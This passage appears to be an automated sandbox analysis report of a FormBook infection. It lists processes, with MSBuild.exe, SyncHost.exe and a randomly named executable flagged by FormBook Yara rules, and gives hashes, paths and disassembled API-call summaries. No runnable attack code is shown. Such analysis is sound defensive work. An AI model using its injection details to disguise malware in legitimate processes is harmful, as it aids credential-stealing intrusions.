'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:39:30
Start date:	17/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x580000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:39:48
Start date:	17/04/2024
Path:	C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe"
Imagebase:	0xa90000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	08:39:50
Start date:	17/04/2024
Path:	C:\Windows\SysWOW64\SyncHost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\SyncHost.exe"
Imagebase:	0x2b0000
File size:	38'912 bytes
MD5 hash:	59E810FBB9C5676F7FE2BA8820B616FF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:40:03
Start date:	17/04/2024
Path:	C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe"
Imagebase:	0xa90000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	08:40:15
Start date:	17/04/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FFD348A37B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2735067008.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: d3694b36191f63e34efa35f3b807460d45462a7b7dfa9681b1266e0bd8e93a8b
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 1801677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651D736E882CB45

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exePID: 4600, Parent PID: 5804COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	5.1%
Signature Coverage:	8%
Total number of Nodes:	138
Total number of Limit Nodes:	11

Executed Functions

Function 004173E3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417455

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 5dd82de7a14cd98672feffd42d130ad58d0084e280357c3c7a2edef832fda8a3
Instruction ID: 24e2159bc3e339635d90da2895517c92da2fa72ac90901778f8be684096208ef
Opcode Fuzzy Hash: 5dd82de7a14cd98672feffd42d130ad58d0084e280357c3c7a2edef832fda8a3
Instruction Fuzzy Hash: DE0171B1E0020DABDF10EBE1DD42FDEB7B8AB14308F0041AAE90C97240F674EB448B95

Uniqueness

Uniqueness Score: -1.00%

Function 0042AF33 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?), ref: 0042AF6A

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: feac1662d33ebfa76c269f0563b656704f195c0d53018b122835002435a69baa
Instruction ID: dade3dd643df3386ef945cb81d72871a91dce4a18ada976aa3f83e7b72e1a9b4
Opcode Fuzzy Hash: feac1662d33ebfa76c269f0563b656704f195c0d53018b122835002435a69baa
Instruction Fuzzy Hash: 14E04F312442147BD610EA5ADC02F9B775CEFC5714F00841AFA08A7141D6B479008BF5

Uniqueness

Uniqueness Score: -1.00%

Function 010335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010335CA

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ee89a0c374c0abfdcf0f6c44f6098f6a4b53d3fc879fba1eb126a36cecb546d
Instruction ID: 28074be30289506fd473c7957fe8f59822c3d5f1b28b45d17eafa746f77820f1
Opcode Fuzzy Hash: 6ee89a0c374c0abfdcf0f6c44f6098f6a4b53d3fc879fba1eb126a36cecb546d
Instruction Fuzzy Hash: D390027160550403E10071988554706100597D0201F65C822A0824568DC7D58A6166A2

Uniqueness

Uniqueness Score: -1.00%

Function 01032B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01032B6A

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e5d7bc9869750eac0ad810ee1791d7558c3234443504cb6d40120b6b52986897
Instruction ID: 6e9c6c13c03672dda7b1df24cb3f87ebc9c6a95a43d71a7b0b16f79d87020cee
Opcode Fuzzy Hash: e5d7bc9869750eac0ad810ee1791d7558c3234443504cb6d40120b6b52986897
Instruction Fuzzy Hash: 389002A120240003510571988454616400A97E0201B55C432E1414590DC56589A16225

Uniqueness

Uniqueness Score: -1.00%

Function 01032DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01032DFA

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3adc925c34c21b4e0fd3cc769cf94bd04390fdb483cb3e48b73e9aaed415ddf
Instruction ID: 190835e39756043219e8e71addd8cfba7a5b7fead86b87fcc3f73e158722bf2d
Opcode Fuzzy Hash: a3adc925c34c21b4e0fd3cc769cf94bd04390fdb483cb3e48b73e9aaed415ddf
Instruction Fuzzy Hash: 8590027120140413E11171988544707000997D0241F95C823A0824558DD6968A62A221

Uniqueness

Uniqueness Score: -1.00%

Function 01032C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01032C7A

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0b3e56b737ebe72b91b4d6dee5ca58136e194d39c63c6105a3a5209402e2c47e
Instruction ID: 10c0a3d42aecd8f18333ed20d577bc7b825b92e8a8102802c0524c0169adbb87
Opcode Fuzzy Hash: 0b3e56b737ebe72b91b4d6dee5ca58136e194d39c63c6105a3a5209402e2c47e
Instruction Fuzzy Hash: C590027120148803E1107198C44474A000597D0301F59C822A4824658DC6D589A17221

Uniqueness

Uniqueness Score: -1.00%

Function 004139FE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-2-2FfKI,00000111,00000000,00000000), ref: 00413AC7

Strings

-2-2FfKI, xrefs: 00413ACE, 00413AD1
-2-2FfKI, xrefs: 00413ABC, 00413AC6, 00413AD7

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -2-2FfKI$-2-2FfKI
API String ID: 1836367815-4229024725
Opcode ID: 5463287992c71aaa84239742191199ca3b2eb29aaf6c7d695cd747bcff22d869
Instruction ID: 697211fdb3e8a98d69c053b66fffeb650db097172b0e08c2eba725661f76cd44
Opcode Fuzzy Hash: 5463287992c71aaa84239742191199ca3b2eb29aaf6c7d695cd747bcff22d869
Instruction Fuzzy Hash: 6D31C0B1E00109EFCB11DEB58C808DEBF78EF52791B08429AF944E7201D3384E06CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00413A4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-2-2FfKI,00000111,00000000,00000000), ref: 00413AC7

Strings

-2-2FfKI, xrefs: 00413ACE, 00413AD1
-2-2FfKI, xrefs: 00413ABC, 00413AC6, 00413AD7

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -2-2FfKI$-2-2FfKI
API String ID: 1836367815-4229024725
Opcode ID: c3087f36c5541de9233561f676d1517d88734532da2fc60d1d95f516564d031b
Instruction ID: ed1796faf4be223b56fe7424ee0b03615c41bab7269eb9733d30b5c5bc2ba9d1
Opcode Fuzzy Hash: c3087f36c5541de9233561f676d1517d88734532da2fc60d1d95f516564d031b
Instruction Fuzzy Hash: C201C4B2E4015C7EEB119AE19C81DEFBB7CDF416A4F01806AFA24A7201D5784F068BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00413A53 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(-2-2FfKI,00000111,00000000,00000000), ref: 00413AC7

Strings

-2-2FfKI, xrefs: 00413ACE, 00413AD1
-2-2FfKI, xrefs: 00413ABC, 00413AC6, 00413AD7

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: -2-2FfKI$-2-2FfKI
API String ID: 1836367815-4229024725
Opcode ID: 3f836e07d8c5da24a3d74b6b3ac8632a006d1b6684e524eacdd1a755c3dc8da1
Instruction ID: 09cd12200022ac3e81d8d1b016bf8f56bf2171bccbc5cd4b26f72d24b517b407
Opcode Fuzzy Hash: 3f836e07d8c5da24a3d74b6b3ac8632a006d1b6684e524eacdd1a755c3dc8da1
Instruction Fuzzy Hash: C501D6B1E4011C7EEB00AAE19C81DEF7B7CDF41294F018069FA14B7101D5785F068BB5

Uniqueness

Uniqueness Score: -1.00%

Function 0042B243 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041DBD8,?,?,00000000,?,0041DBD8,?,?,?), ref: 0042B27F

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 85107503ea2f200c2d5ebde3bafdc3e13f0f655d15d3b0f9889aa7bd0da3e4ee
Instruction ID: f55b983a311696bfd812ee680296b7432f4eb0835d1e6a94844badf7b51151a9
Opcode Fuzzy Hash: 85107503ea2f200c2d5ebde3bafdc3e13f0f655d15d3b0f9889aa7bd0da3e4ee
Instruction Fuzzy Hash: 0EE06D712042097BCA14EF59DC45FDB77ACEFC8710F004019FA08A7242CB70B9108BB8

Uniqueness

Uniqueness Score: -1.00%

Function 0042B293 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,03E28301,00000007,00000000,00000004,00000000,00416CB5,000000F4,?,?,?,?,?), ref: 0042B2CF

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 43511a69416499a280bd1d5a2859c26402334f983633b843c25e1ff624ded580
Instruction ID: 2b07060c7a88b343e75dd72033de2e2e195c19ee124ae443b7436d72875d0592
Opcode Fuzzy Hash: 43511a69416499a280bd1d5a2859c26402334f983633b843c25e1ff624ded580
Instruction Fuzzy Hash: C6E06DB22042057BDA10EE59EC41F9B77ACEFC4710F008019FA08A7241CA74B9108BB9

Uniqueness

Uniqueness Score: -1.00%

Function 0042B2E3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,?,?,95966D06,?,?,95966D06), ref: 0042B31A

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 956fa68d000eca28dfdfae24e78cae4124099cb45fbece987e8c6393cf0a7002
Instruction ID: 4d28ac5689a377a00038429bc9d27c556cb07aacd06e8005c886d7b63c871cd2
Opcode Fuzzy Hash: 956fa68d000eca28dfdfae24e78cae4124099cb45fbece987e8c6393cf0a7002
Instruction Fuzzy Hash: 64E04F357042147BD620FA5ADC01F9BB76CEBC5714F00401AFA0CA7141C7B479048BF4

Uniqueness

Uniqueness Score: -1.00%

Function 01032C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01032C24

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 395af0aa276d53de0918bbb6dfad15a8c2feeaadf9e8c7192087de1dbfa7f343
Instruction ID: 360aed033d96ba6cd951f9c2f077659fb43aa4c1b7b4fcde84f11679fcdc7e69
Opcode Fuzzy Hash: 395af0aa276d53de0918bbb6dfad15a8c2feeaadf9e8c7192087de1dbfa7f343
Instruction Fuzzy Hash: 65B09B719015C5C6EA51F7A44608717794477D0701F15C472D2430641F4778D1E1E275

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01072349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

DisableExceptionChainValidation, xrefs: 0107275F
CFGOptions, xrefs: 01072967
GlobalFlag, xrefs: 01072F3F, 01073059
RaiseExceptionOnPossibleDeadlock, xrefs: 01072579
LdrpInitializeExecutionOptions, xrefs: 0107317D
DisableHeapLookaside, xrefs: 0107246D
ShutdownFlags, xrefs: 010724A1
MaxDeadActivationContexts, xrefs: 01072D82
MinimumStackCommitInBytes, xrefs: 01072BB0
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01073176
ExecuteOptions, xrefs: 010725A0
UnloadEventTraceDepth, xrefs: 010724C0
minkernel\ntdll\ldrinit.c, xrefs: 01073187
UseImpersonatedDeviceMap, xrefs: 0107251C
FrontEndHeapDebugOptions, xrefs: 01072489
TracingFlags, xrefs: 01072549
MaxLoaderThreads, xrefs: 010724EC
@, xrefs: 01072942
GlobalFlag2, xrefs: 01072FC0
@, xrefs: 01072B74

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 1a5c37dfb09ba5453b3a54823080d9846bee4d8f83b1cbfcec24f5b3a1e8eba4
Instruction ID: 01e40fb7744c7e9676628a3d6565877f62cb203bf614e4ccdb59eb6c0eedbd39
Opcode Fuzzy Hash: 1a5c37dfb09ba5453b3a54823080d9846bee4d8f83b1cbfcec24f5b3a1e8eba4
Instruction Fuzzy Hash: 0992AE71A04346AFE725DF28C840BABB7E8BB84754F04492DFAD4DB291D770E844CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00FE68B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON

Download Yara Rule

Strings

SE_LdrResolveDllName, xrefs: 00FE6A2C
SE_ProcessDying, xrefs: 00FE69FF
ApphelpCheckModule, xrefs: 00FE6A86
SE_InstallAfterInit, xrefs: 00FE694B
SE_DllLoaded, xrefs: 00FE6978
LdrpGetShimEngineInterface, xrefs: 01049BB9
minkernel\ntdll\ldrinit.c, xrefs: 01049BC3
SE_ShimDllLoaded, xrefs: 00FE68F1
SE_LdrEntryRemoved, xrefs: 00FE69D2
SE_DllUnloaded, xrefs: 00FE69A5
SE_InstallBeforeInit, xrefs: 00FE691E
SE_GetProcAddressForCaller, xrefs: 00FE6A59
SE_InitializeEngine, xrefs: 00FE68C5
Could not locate procedure "%s" in the shim user DLL, xrefs: 01049BB3
apphelp.dll, xrefs: 00FE698A

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim user DLL$LdrpGetShimuserInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_Initializeuser$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-3089669407
Opcode ID: 32083fc27d5c5dafde3cc710697d0aad9c4d60d5d5eb2a6264e9410e811f1b29
Instruction ID: 4f3a542bcc84631999948a64671bb770721a0ca60ce1f13de8e4a46f3d5414dd
Opcode Fuzzy Hash: 32083fc27d5c5dafde3cc710697d0aad9c4d60d5d5eb2a6264e9410e811f1b29
Instruction Fuzzy Hash: D58162B2D022096F8B21EBD5DED1EDF77FDAB58744B040526B940FB110E326ED049BA1

Uniqueness

Uniqueness Score: -1.00%

Function 01020F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON

Download Yara Rule

Strings

9, xrefs: 01020F9C
%%%u!%s!, xrefs: 010614A1
l, xrefs: 01020FC4
%%%u, xrefs: 010614CC
%, xrefs: 01020F7E
!, xrefs: 01020FA6
0, xrefs: 01020F92
h, xrefs: 01020FB0
, xrefs: 01020FEC
w, xrefs: 01020FBA

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
API String ID: 0-360209818
Opcode ID: d06dc71fb1daa19ab6ad008bbd7b90b33dfba7d2e3c42ca921ffbf5ee68360e7
Instruction ID: 788fc7d881a498493a554082ba5c7ab1089eebd084c17028dfe9ec77815c5f31
Opcode Fuzzy Hash: d06dc71fb1daa19ab6ad008bbd7b90b33dfba7d2e3c42ca921ffbf5ee68360e7
Instruction Fuzzy Hash: F5628FB5A002298FDB64CF18C8417A9B7FABFD5310F5482DAE589AB240D7765EE1CF40

Uniqueness

Uniqueness Score: -1.00%

Function 010A12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Free Heap block %p modified at %p after it was freed, xrefs: 010A171B
HEAP: , xrefs: 010A1706, 010A1756, 010A17A8, 010A1809, 010A184D, 010A1895, 010A18E6
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 010A176D
Heap block at %p is not last block in segment (%p), xrefs: 010A17B7
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 010A18F8
Heap block at %p has incorrect segment offset (%x), xrefs: 010A181A
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 010A186B
HEAP[%wZ]: , xrefs: 010A16CD, 010A16F9, 010A1749, 010A179B, 010A17FC, 010A1840, 010A18D9
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 010A18A5

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: e7900027e30819fd75cdfcae0a6de2fe29c47d6641d0913067d58de474aa6340
Instruction ID: 42d5238c1f8b3f01466b54cf01556641d7663ffdcb93dfaeb53071487ab4acdd
Opcode Fuzzy Hash: e7900027e30819fd75cdfcae0a6de2fe29c47d6641d0913067d58de474aa6340
Instruction Fuzzy Hash: 4112D030604642EFD725CFA9C445BBABBF5FF09714F988499E5C68B682D738E880DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0100AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

LdrGetDllHandleEx, xrefs: 0105807C, 010583B2
LdrpFindLoadedDllInternal, xrefs: 010582D7
minkernel\ntdll\ldrfind.c, xrefs: 010582E1
DLL search path passed in externally: %ws, xrefs: 010580A6
DLL name: %wZ, xrefs: 01058075
minkernel\ntdll\ldrapi.c, xrefs: 01058086, 010583BC
LdrpInitializeDllPath, xrefs: 010580AD
minkernel\ntdll\ldrutil.c, xrefs: 010580B7
Status: 0x%08lx, xrefs: 010582D0, 010583AB

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: 0c8ea494abb6da162e37215cc68ddb3ba366eaf34ef908ec5a156d675655c8c5
Instruction ID: 90b7ac0e2e7625dcaf5164220f4923be328ce512017d1f2c10d2d7d51c98ca99
Opcode Fuzzy Hash: 0c8ea494abb6da162e37215cc68ddb3ba366eaf34ef908ec5a156d675655c8c5
Instruction Fuzzy Hash: 9812DF71608342CBE766DB29C880BABB7E5BF84704F04496EF9C58B2D1E735D944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00FED34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 00FED4B8, 00FED4C5
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 00FED3B6
